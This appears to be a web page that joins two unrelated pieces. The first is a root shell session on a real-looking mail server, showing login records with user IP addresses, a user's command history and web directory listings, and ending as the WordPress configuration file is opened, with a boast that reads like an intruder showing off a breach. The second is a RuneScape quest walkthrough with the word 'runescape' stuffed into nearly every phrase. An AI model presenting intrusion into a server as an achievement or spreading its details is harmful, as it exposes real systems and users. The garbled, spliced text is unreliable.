Linux mail.tip.it 2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@mail arena_test]# last -a
eira     pts/0        Mon Oct 10 04:53 - 07:06  (02:12)     95.233.233.42
eira     pts/0        Sat Oct  8 01:22 - 03:37  (02:14)     host17-203-dynamic.58-82-r.retail.telecomitalia.it
eira     pts/1        Thu Oct  6 03:26 - 05:43  (02:17)     host46-171-dynamic.56-82-r.retail.telecomitalia.it
[root@mail eira]# cat .bash_history | tail
ls -al
exit
cd /etc/httpd/conf.d
ls -al
su
cd /etc/httpd/conf.d
su
w
cd /etc/httpd/conf.d
su
[root@mail ~]# ls -la /var/www
total 16656
drwxr-xr-x 36 root      root     4096 2011-06-23 02:56 .
drwxr-xr-x 25 root      root     4096 2007-10-19 10:20 ..
drwxr-xr-x 12 eira      eira     4096 2008-08-31 11:00 arena
drwxr-xr-x 10 eira      eira     4096 2006-10-27 05:01 arena_old
drwxr-xr-x  5 eira      eira     4096 2011-08-01 07:29 arredareinsieme
drwxr-xr-x 17 eira      eira     4096 2009-11-30 18:16 asquinimobili
drwxr-xr-x  3 eira      eira     4096 2010-07-06 11:23 atc
drwxr-xr-x 11 eira      eira     4096 2010-03-29 16:07 cetekor
drwxr-xr-x  2 eira      eira     4096 2010-03-19 11:40 cetekor_mom
drwxr-xr-x  2 root      root     4096 2008-01-24 10:45 cgi-bin
drwxr-xr-x  7 eira      eira     4096 2011-06-13 10:10 common
drwxr-xr-x  9 eira      eira     4096 2009-03-29 07:01 control_panel
drwxr-xr-x  2 eira      eira     4096 2011-06-13 10:09 dompdf
drwxr-xr-x  2 eira      eira     4096 2008-08-26 12:17 easygadget
drwxr-xr-x 11 eira      eira     4096 2011-07-07 02:56 ecolo
drwxr-xr-x 25 eira      eira     4096 2011-06-07 03:18 eira
drwxr-xr-x  7 eira      eira     4096 2009-04-22 06:45 erboristeria
drwxr-xr-x  3 root      root     4096 2008-03-14 07:48 error
drwxr-xr-x  3 root      root     4096 2008-01-24 10:45 html
-rw-r--r--  1 root      root  4229120 2007-05-05 16:24 html.tar
drwxr-xr-x  3 root      root     4096 2008-05-24 04:10 icons
drwxr-xr-x  4 eira      eira     4096 2006-11-18 16:19 img
-rw-r--r--  1 root      root 12584960 2007-05-05 16:24 img.tar
drwxr-xr-x  7 eira      eira     4096 2010-03-05 02:10 irontrader
drwxr-xr-x 15 eira      eira     4096 2010-07-14 05:43 kitepower
drwxr-xr-x 14 root      root    12288 2008-03-14 07:48 manual
drwxr-xr-x 12 eira      eira     4096 2011-05-30 05:06 mauri
-rw-r--r--  1 root      root    20480 2007-05-05 16:24 mauri.tar
drwxr-xr-x  2 eira      eira     4096 2009-05-17 06:43 mdarredamenti
drwxr-xr-x 17 eira      eira     4096 2011-10-09 06:53 miniatures
drwxr-xr-x 10 eira      eira     4096 2009-05-07 12:50 molino
drwxr-xr-x 18 eira      eira     4096 2011-06-25 03:32 pavimenti
drwxr-xr-x  6 eira      eira     4096 2011-06-25 18:02 supportservice
drwxr-xr-x  9 eira      eira     4096 2010-08-08 12:59 trieste
drwxr-xr-x  3 eira      eira     4096 2008-07-14 13:39 ts_affitta
drwxr-xr-x  2 webalizer root    12288 2011-10-01 04:22 usage
drwxr-xr-x  6 eira      eira     4096 2007-01-02 07:24 virtualftp
drwxr-xr-x 14 eira      eira     4096 2011-06-24 11:59 westistramodus
drwxr-xr-x  2 eira      eira     4096 2010-03-01 03:31 wip
[root@mail www]# cd mauri
[root@mail mauri]# ls -al
total 84
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 ..
drwxrwxr-x  2 eira eira 4096 2008-02-15 13:47 ~atc
drwxrwxr-x  2 eira eira 4096 2007-11-26 16:04 avatar
drwxrwxr-x  5 eira eira 4096 2008-02-16 04:53 blog
drwxrwxr-x  2 eira eira 4096 2011-05-30 08:11 DOM_PDF
drwxr-xr-x  2 eira eira 4096 2008-03-13 10:05 file
-rw-r--r--  1 eira eira 4356 2007-08-14 11:37 index.html-1
-rw-r--r--  1 eira eira 4565 2007-10-08 11:48 index.html-2
-rw-rw-r--  1 eira eira 2217 2011-04-05 04:22 index.php
-rw-r--r--  1 eira eira 4697 2007-10-08 11:56 index.php-1
-rw-r--r--  1 eira eira  224 2008-06-06 18:06 ip.php
drwxrwxr-x  2 eira eira 4096 2008-03-13 09:37 lib
drwxr-xr-x  3 eira eira 4096 2010-05-06 05:40 PHP_PDF
drwxrwxr-x  2 eira eira 4096 2009-05-20 07:22 prove_cetekor
drwxrwxr-x  3 eira eira 4096 2008-06-23 12:46 prove_G45v
drwxr-xr-x  2 eira eira 4096 2007-10-08 11:46 styles
[root@mail mauri]# ls -al
total 84
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 ..
drwxrwxr-x  2 eira eira 4096 2008-02-15 13:47 ~atc
drwxrwxr-x  2 eira eira 4096 2007-11-26 16:04 avatar
drwxrwxr-x  5 eira eira 4096 2008-02-16 04:53 blog
drwxrwxr-x  2 eira eira 4096 2011-05-30 08:11 DOM_PDF
drwxr-xr-x  2 eira eira 4096 2008-03-13 10:05 file
-rw-r--r--  1 eira eira 4356 2007-08-14 11:37 index.html-1
-rw-r--r--  1 eira eira 4565 2007-10-08 11:48 index.html-2
-rw-rw-r--  1 eira eira 2217 2011-04-05 04:22 index.php
-rw-r--r--  1 eira eira 4697 2007-10-08 11:56 index.php-1
-rw-r--r--  1 eira eira  224 2008-06-06 18:06 ip.php
drwxrwxr-x  2 eira eira 4096 2008-03-13 09:37 lib
drwxr-xr-x  3 eira eira 4096 2010-05-06 05:40 PHP_PDF
drwxrwxr-x  2 eira eira 4096 2009-05-20 07:22 prove_cetekor
drwxrwxr-x  3 eira eira 4096 2008-06-23 12:46 prove_G45v
drwxr-xr-x  2 eira eira 4096 2007-10-08 11:46 styles
[root@mail mauri]# cd blog
[root@mail blog]# ls -al
total 252
drwxrwxr-x  5 eira eira  4096 2008-02-16 04:53 .
drwxr-xr-x 12 eira eira  4096 2011-05-30 05:06 ..
-rw-r--r--  1 eira eira   186 2008-02-16 04:51 .htaccess
-rw-r--r--  1 eira eira    94 2006-11-19 01:56 index.php
-rw-r--r--  1 eira eira 15127 2003-04-01 07:12 license.txt
-rw-r--r--  1 eira eira  7635 2007-08-28 13:01 readme.html
drwxr-xr-x  7 eira eira  4096 2008-02-04 22:06 wp-admin
-rw-r--r--  1 eira eira 33489 2007-12-27 18:47 wp-app.php
-rw-r--r--  1 eira eira   129 2007-08-02 18:45 wp-atom.php
-rw-r--r--  1 eira eira   997 2007-05-09 10:18 wp-blog-header.php
-rw-r--r--  1 eira eira  2923 2007-07-04 10:12 wp-comments-post.php
-rw-r--r--  1 eira eira   153 2007-08-02 18:45 wp-commentsrss2.php
-rw-r--r--  1 eira eira   947 2007-10-22 07:05 wp-config.php
-rw-r--r--  1 eira eira   965 2007-05-12 12:29 wp-config-sample.php
drwxr-xr-x  6 eira eira  4096 2008-02-04 22:06 wp-content
-rw-r--r--  1 eira eira   851 2007-08-02 18:45 wp-cron.php
-rw-r--r--  1 eira eira   120 2006-11-19 01:56 wp-feed.php
drwxr-xr-x  4 eira eira  4096 2008-02-04 22:06 wp-includes
-rw-r--r--  1 eira eira  1525 2007-09-23 13:25 wp-links-opml.php
-rw-r--r--  1 eira eira 16654 2007-09-25 17:17 wp-login.php
-rw-r--r--  1 eira eira  5587 2007-12-29 13:38 wp-mail.php
-rw-r--r--  1 eira eira   296 2007-09-18 16:23 wp-pass.php
-rw-r--r--  1 eira eira   190 2007-08-02 18:45 wp-rdf.php
-rw-r--r--  1 eira eira   251 2006-10-11 03:26 wp-register.php
-rw-r--r--  1 eira eira   129 2007-08-02 18:45 wp-rss2.php
-rw-r--r--  1 eira eira   127 2007-08-02 18:45 wp-rss.php
-rw-r--r--  1 eira eira 10834 2007-12-20 20:57 wp-settings.php
-rw-r--r--  1 eira eira  3520 2007-08-02 18:45 wp-trackback.php
-rw-r--r--  1 eira eira 61403 2008-02-04 12:52 xmlrpc.php
[root@mail blog]# cat wp-config.php

....Etc....I think you get the fish.

Sphere: Related Content

Ritual of the Mahjarrat Step-by-step quest guide

1. Description of the Ritual of the Mahjarrat quest in RuneScape:
2. They signal their arrival with a devastating shriek, and leave nothing but ash, flame and destruction in their wake. All tremble in fear as they approach, and the runescape ground rumbles in sympathy. 
3. 
   
4. Word of an attack on the runescape isle of Mos Le'Harmless has reached the runescape ears of Sir Tiffy Cashien. Should you choose to accept his request, you will be sent to aid Sir Tendeth who has come across a great threat to the runescape world; one far greater than the runescape pirates he was originally sent to investigate. 
5. 
   
6. Do you have the runescape stomach to investigate this new threat, and see it through to the runescape end? Or will you leave the runescape world to its doom while you cower in fear?
7. Difficulty:
8. Grandmaster
9. Length:
10. Very, Very Long
11. Quest Requirements:
12. The Temple at Senntisten
13. While Guthix Sleeps
14. Hazeel Cult
15. Enakhra's Lament
16. Slug Menace
17. Fairy Tale Part III - Battle at Orks Rift, A
18. Rocking Out
19. Tail of Two Cats, A
20. Fight Arena
21. Skill/Other Requirements:
22. 77 Agility 
23. 76 Crafting 
24. 76 Mining
25. Items Needed at Quest Start:
26. None.
27. Items Needed to Complete Quest:
28. Ring of Visibility, Rope, and Catspeak amulet (e)
29. Items Recommended for Quest:
30. Lots of food and combat gear.
31. Items Acquired During Quest:
32. Bob's collar, Note to you, Note to Robert, Tetrahedron 1, Tetrahedron 2, Tetrahedron 3, Tetrahedron 4, Robert's necklace, Statue arm, Steel pickaxe, Strange device, Kethsian key, Scroll, Dathana's message, 4 Teleorbs, 4 Beacons, Arrav's heart, Chisel, Spade, Decoder strips, Code key (main entrance), Code key (storeroom), Code key (reliquary), Heart magic notes, Heat globe.
33. Quest Points:
34. 3
35. Reward:
36. 110K Agility XP, 60K Constitution XP, 40K Crafting XP, 40K Mining XP, three 80K XP Lamps, access to fight a new Barrows brother and gain new Barrows equipment, access to mine Bane ore, access to the runescape new lunar spell Tune Bane Ore, ability to make Bane arrows and bolts, the runescape ability to gain combat bonuses in certain areas, access to fight Glacors, ability to runecraft Armadyl runes, ability to create an Armadyl staff to enhance the runescape Storm of Armadyl spell, and a bonus 3K Prayer XP.
37. Start Point:
38. Falador Park.
39. To Start:
40. Speak to Sir Tiffy Cashien in the runescape Falador Park.
41. Instructions:
42. Head to Falador park and speak to Sir Tiffy Cashien sitting on the runescape park bench. Ask him about the runescape Ritual of the runescape Mahjarrat and he will inform you of the runescape worrying information from his contact, Sir Tendeth, currently located in the runescape Other Inn on Mos Le'Harmless. 
43. 
    
44. NOTE: If you accept the runescape quest and continue with the runescape conversation Sir Tiffy will offer you a free teleport to Mos Le'Harmless. If you walk away after starting the runescape quest you will have to make your own way to the runescape island. the runescape fastest way to do this is the runescape Ectophial teleport to the runescape Ectofuntus, followed by Captain Teach's ship from Port Phasmatys. 
45. 
    
46. Speak to Sir Tendeth in the runescape inn and he will tell you that this has nothing to do with pirates but a greater foe. A small cut-scene will occur once you select to continue with the runescape quest. 
47. 
    
48. Head north towards the runescape jungle to try to discover the runescape mysterious beast that has been causing the runescape destruction - food and energy restore methods are recommended for this part. Upon entering the runescape jungle a cut-scene will occur, causing Sir Tendeth to be killed by a ball of fire from the runescape east. 
49. 
    
50. Using the runescape vegetation as cover, move in an easterly direction, following the runescape trail of scorch marks. Valid cover includes the runescape large tropical trees, small trees and the runescape burnt trees (these last show only as tiny white dots on the runescape minimap). You have to be on a square directly to the runescape west of these trees to be safe from the runescape fireballs. If you are hit by a fireball you will be dealt around 275 LP of damage and be returned to the runescape entrance of the runescape jungle to start all over again. 
51. 
    
52. The attacks are originating from a triangle of trees just past the runescape Trouble Brewing minigame. Once you reach this area a cutscene will occur showing three beasts planning their assault on a greater population of people. You must notify Sir Tiffy of what you have seen, so teleport back to Falador and speak to him in the runescape park. 
53. 
    
54. Sir Tiffy will ask you to describe the runescape creatures you saw, before teleporting you to the runescape research area of the runescape White Knights. Speak to Sir Tiffy or Lady Table and a discussion will ensue where Lady Table will research your description and confirm the runescape creatures to be Dragonkin. She also has notes about the runescape Dragonkin referring to Robert the runescape Strong, who you know to be now reincarnated as Bob the runescape Cat, and also of a Stonetoucher, who you know to be yourself after touching the runescape Stone of Jas during While Guthix Sleeps. They suggest you go find Bob the runescape Cat and borrow his collar to find out how to access the runescape plain of Kethsi. 
55. 
    
56. Bob the runescape Cat can be located anywhere on the runescape mainland of Gielinor. Use your Catspeak amulet (e) to track him down. Once you have tracked down Bob, speak to him whilst wearing your amulet and ask to see his collar. Study the runescape collar and flip it over to find the runescape code: DIRAKS. 
57. 
    
58. Head to the runescape nearest or most convenient fairy ring and enter the runescape code D I R followed by A K S to arrive in Kethsi. 
59. 
    
60. Head north west and search the runescape rubble next to a wall mural to find Tetrahedron 4. 
61. 
    
62. Climb up the runescape ramp towards the runescape eastern side, and head north to find a wall design. Investigate this to view the runescape design in detail and notice that the runescape patterns match those on Bob's collar. 
63. 
    
64. Use Bob's collar on the runescape wall design to start a small puzzle where the runescape collar is a missing piece and the runescape patterns have to match up. the runescape collar should be placed between the runescape two decorative panels on the runescape right by being flipped and rotated until correct. After this a secret compartment will open up giving the runescape player five new items: Note to you, Note to Robert, Tetrahedron 1, Robert's necklace, and a statue arm. 
65. 
    
66. Head south west by jumping over the runescape ledge near the runescape ramp and 
67. 
    
68. Use the runescape statue arm on the runescape broken statue nearby. A fallen spire should appear allowing you passage to the runescape other side.
69. 
    
70. Head down the runescape ladder and run up the runescape wall to the runescape east. Once on the runescape platform, climb up the runescape wall to the runescape top of the runescape tower. 
71. 
    
72. Swing on the runescape poles to the runescape other side before cartwheeling along the runescape beam and jumping the runescape gap to the runescape next ledge. 
73. 
    
74. Jump across another gap and climb down the runescape ladders to ground level. Crawl through the runescape pipe to the runescape north. 
75. 
    
76. Take the runescape nearby pickaxe and mine through the runescape rocks blocking your path, before climbing up the runescape wall to the runescape platform. 
77. 
    
78. Run across the runescape northern wall and repeat to cross a second one after you land. Climb across the runescape handholds and head down the runescape ladder to the runescape sand. 
79. 
    
80. Run northwest out of the runescape ruins and then east along the runescape coastline until you find some rubble. Search it for Tetrahedron 3 and a Strange device. 
81. 
    
82. Head back ro the runescape northwest ruins, climb up the runescape ladders to the runescape top of the runescape tower, jump across the runescape gap and finally slide down the runescape roof. 
83. 
    
84. Head south and ignore the runescape steps leading underground for now. Cross the runescape plank to the runescape small island and search the runescape rubble for Tetrahedron 2. 
85. 
    
86. Head back across the runescape plank and enter the runescape foyer of the runescape underground area. Use all 4 of your Tetrahedrons on the runescape indentations on the runescape wall and note down the runescape code you are given. You can open your quest journal to find out the runescape code at any time if you forget it. 
87. 
    
88. Go outside and use the runescape check-output option of the runescape strange device. You will see different code readings at different locations. Walk around the runescape area of Kethsi checking the runescape output as you go along until it matches to your quest journal. Once you've found the runescape location, use your Spade to dig and receive a Kethsian key. Head back to the runescape cave by redoing various parts of the runescape course.
89. Open the runescape door with the runescape key, head inside, and search the runescape south bookshelves for a book and the runescape southeast corner for a scroll. Reading the runescape scroll will unlock a new lunar spell: Tune Bane Ore. Next read the runescape book titled Dathana's message. 
90. 
    
91. When you are finished, teleport back to Sir Tiffy Cashien in Falador park to report your findings. He will tell you to involve the runescape While Guthix Sleeps crew into your findings as they know about the runescape Stone of Jas and may be able to help you.
92. Head to Falador castle and speak to Akrisae, Idria or Thaerisk. the runescape group will try to work out a way to stop Lucien and the runescape Dragonkin. Ali the runescape Wise arrives on the runescape scene during the runescape discussion. He interrupts you to suggest using one Mahjarrat to defeat and trick Lucien, another Mahjarrat. Akrisae will oppose this plan and you must convince him to follow through with it. They suggest you head to Ghorrock and give you some teleorbs to plant on the runescape Stone the runescape Jas. Ali the runescape Wise will suggest you hide Arrav's heart somewhere on the runescape ritual site for later use. 
93. 
    
94. Before heading to Ghorrock, travel to Senntisten located at the runescape Digsite and speak to Azzanadra. He will accept the runescape offer of you aiding not only him, but him also aiding you and your team against Lucien. He will give you four Beacons. 
95. 
    
96. The safest route to your location is to travel to the runescape Fremmenik hunter area using the runescape fairy ring code D K S and take the runescape canoe that's located northwest from the runescape fairy ring. When the runescape canoe journey ends, head east past the runescape ice block to enter Ghorrock castle. This route enables you to avoid the runescape Wilderness and any potential dangers it may hold. 
97. 
    
98. Alternatively, if you are feeling brave, you can travel through the runescape Wilderness to the runescape temple located in the runescape Ice Plateau and squeeze past the runescape ice block. 
99. 
    
100. NOTE: An anti-dragon shield or dragonfire shield and an Antifire potion is recommended once you pass the runescape ice blocks as there are metal dragons in this area. 
101. 
     
102. Once inside head towards the runescape middle of the runescape south wall. Climb over the runescape fallen pillar and enter the runescape tunnel beyond. 
103. 
     
104. You will end up in an ice area with undead broavs patrolling and you must avoid them by staying hidden. If you get caught you will be teleported to a prison. To escape, search the runescape bed to find a Chisel and Spade. Lift the runescape floor tile, dig the runescape soil, and climb through the runescape hole.
105. Head east to where you were captured. You must run around the runescape area placing the runescape four beacons at exact opposite ends of each other on the runescape northern, eastern, southern and western side in the runescape dead trees in the runescape area. 
106.  
107.  
108.  
109. 
     
110. Next place Arrav's heart in a rock south of the runescape ritual stone at the runescape center of the runescape area. 
111. 
     
112. Head north west and tie the runescape Rope to the runescape overhanging tree to allow the runescape rest of your team to safely gain access to the runescape area. 
113. 
     
114. Head south towards the runescape castle and kill the runescape Armoured zombie near the runescape entrance to obtain Decoder strips and Code key (Main entrance). You need to use the runescape strips and code to deduce the runescape pin to the runescape door. Use the runescape strips on their corresponding letters and enter the runescape 4 digits that are highlighted, first from strip 1, then strip 2 etc. This is the runescape same puzzle that you faced in the runescape Curse of Arrav. Once unlocked, enter the runescape door and you will be inside the runescape base. 
115. 
     
116. Head north east and search the runescape crate to obtain Code key (Storeroom) and then go west and open the runescape door, this time using the runescape letters from the runescape newest code key. Head north into the runescape next room and search the runescape crate to find Code key (reliquary) and Heart magic notes. 
117. 
     
118. Leave the runescape storeroom, head up the runescape eastern staircase, and open the runescape door using your reliquary key code. Enter the runescape room and head south to find a black stone on a pillar. Smash this stone and leave the runescape room. 
119. 
     
120. Leave the runescape castle and head to Movario who is located far east of the runescape castle. He will inform you that he senses some shadow magic in the runescape area, which may be concealing the runescape Stone of Jas. 
121. 
     
122. Head west of Movario while weilding a Ring of visibility and you will see a Shadow pedestal. There is a cave, it's entrance blocked by a wall of ice, to the runescape south of the runescape pedestal.
123. Head north, leave the runescape area, and run north into Ghorrock castle. Climb up the runescape western stairs and down stairs on the runescape other side. Climb up the runescape eastern wall, walk around to the runescape northwest corner and climb down the runescape western wall. Turn on Protect from Magic as you enter the runescape castle. Run all the runescape way west, then all the runescape way south to pick up the runescape Heat globe on the runescape floor.
124. Return to the runescape Shadow pedestal and use the runescape Heat globe on it. the runescape wall of ice blocking the runescape way will thaw. Do not enter the runescape cave until you have read the runescape section below and are ready to fight. 
125. 
     
126. The Battles: 
127. 
     
128. Now is the runescape time to go and get ready for combat. Once you touch the runescape Stone of Jas you will trigger a series of cutscenes alternated with battles. You cannot leave the runescape area and will die if you aren't prepared to fight. 
129. 
     
130. Please read the runescape following steps BEFORE you engage in combat with Lucien's minions! 
131. 
     
132. You will find yourself in an ice cave. Head south to discover the runescape Stone of Jas, touch it, and a very interesting cutscene will play with its own cinematic music! the runescape Stone of Jas boosts your combat stats significantly, so super sets are NOT needed. It is NOT recommended to use Saradomin Brews, as they will lower your boosted stats. Use rocktails or sharks instead. If you have a familiar that can attack, it will be able to deal high damage as well due to the runescape boost from the runescape Stone of Jas. It may be highly beneficial to bring a Spirit Kyatt with Ambush scrolls, as its attacks will most likely deal a lot of damage. For those with 88 summoning and above, Unicorn Stallions are useful for healing, otherwise, rocktails or sharks will do just fine. Once again, using Saradomin Brews for healing is NOT recommended. Finally, do bring a couple of Prayer potions, as you will be using Protect from Melee and Protect from Magic in different fights. 
133. 
     
134. You will go through four waves of combat against Lucien's minions. If you happen to die during one of these waves, you will be able to resume fighting from that battle; in other words, you won't have to start over. Furthermore, your gravestone will appear in the runescape area you arrived by. If you arrived at the runescape Ice Plateau by canoe, your grave will appear at the runescape base of the runescape rope tied to the runescape overhanging tree.
135. Boss Fight I - General Khazard (level 250): 
136. 
     
137. After the runescape cutscene ends, an alarm will be activated around the runescape Stone of Jas causing you to be teleported out of the runescape cave to your backup, where you will be ambushed by General Khazard. He reveals Ali the runescape Wise to be a Mahjarrat known as Wahisietel. You must decide whether or not you suspected Ali the runescape Wise. You must now fight General Khazard, and although you are aided by the runescape Stone of Jas, you will still face great danger. 
138. 
     
139. General Khazard's combat level is 250, and uses magic attacks; therefore, using Protect from Magic prayer is recommended. General Khazard also occasionally summons a dog familiar, Bouncer, to attack you. You will NOT be able to attack Bouncer, but you can lure it towards one of your NPC allies, preferably Wahisietel, who will be able to kill Bouncer in one hit. Once General Khazard is nearly dead, a short cut-scene will occur that shows him teleporting away, and allowing you to continue your journey.
140. Boss fight II - Enhanced Ice Titans (level 275): 
141. 
     
142. It is not long before you bump into Lucien himself, who is extremely difficult to defeat due to him summoning four Enhanced ice titans to aid him. These titans have devastating attacks, but you are only required to kill TWO of them. You can ignore Lucien, but avoid his shadow spell as it can deal consistant damage. To avoid his magic, move two or more steps away from the runescape spell before it lands on you. the runescape shadow spell can hit up to 150 life points five times, and hits through prayer! While attacking the runescape titans, be sure to move around a bit to avoid any close calls. 
143. 
     
144. You can attack the runescape two titans with either melee or range. If using melee, be sure to use Protect from Melee while facing them. You will be frozen randomly by the runescape giants in a big block of ice. As soon as you are frozen, try to move around as quickly as possible in order to break through the runescape ice. If successful, you will not take any damage. If using range, you can lure the runescape titans into the runescape trees nearby to trap them. Long-ranged style of attack is recommended. Do keep an eye out for Lucien's shadow spell! Once the runescape two titans are killed, a cut-scene will occur.
145. Boss fight III - Ice Demons (level 300): 
146. 
     
147. Lucien will now summon a horde of Ice demons to kill you. Like the runescape ice titans, you only need to kill TWO demons. However, they use magic and ranged attacks, and it's strongly recommended to use Protect against Magic, as their magic attacks are dangerous. Because you are Praying against Magic, make sure your armor has good range defence. the runescape demons can shoot icicles from the runescape ground to trap you. They do not hurt you, but they can hinder your movement. You can attack the runescape icicle traps within 2-3 hits, but if trapped and hit by Lucien's shadow spell, you will take a lot of damage! Keep moving to evade Lucien's spell and stop yourself getting trapped by the runescape icicles. Once you have defeated two of these monsters, you will end up outside of the runescape iced area.
148. Boss fight IV - Arrav (level 250): 
149. 
     
150. Re-enter the runescape tunnel to start the runescape cutscene where Lucien will decide who to sacrifice in the runescape ritual. A lot of Mahjarrat will appear and an argument will break out. Lucien decides Jhallan shall be the runescape one to die, but a fight breaks out again. Kill the runescape Armoured zombies that are summoned and another cutscene will occur, showing Arrav being summoned to fight the runescape Barrows brothers. You must attract Arrav's attention by attacking him until he decides to attack you, and then lead him over towards the runescape rock where you earlier concealed his heart. Run around the runescape rock until a chat box occurs where he will realize who he really is and attack Zemouregal.
151. As Zemouregal is being killed, he will realize that Lucien will not save him, thus he will turn on Lucien. Additionally, he will start the runescape ritual to rejuvenate the runescape Mahjarrat. Together the runescape Mahjarrat will attack Lucien but will not fully succeed. A cutscene will show the runescape Dragonkin come back and become angry at Lucien for abusing the runescape Stone of Jas. They destroy him and warn the runescape rest of the runescape Mahjarrat who will panic and teleport away. Idria will also be killed. the runescape cutscene continues with Sliske turning Akrisae into a Barrows brother. Sir Tiffy suggests that the runescape stone be hidden so it cannot be found again, and will summon Thaerisk Cemphier to help hide it. the runescape cutscene then continues with you entering a trance and being chased through Draynor Village by the runescape Dragonkin with Sir Tiffy, while those who have fallen to Lucien watch on. Finally the runescape cutscene will end and you will arrive in Falador park. Speak to Sir Tiffy Cashien to claim your reward. 

Sphere: Related Content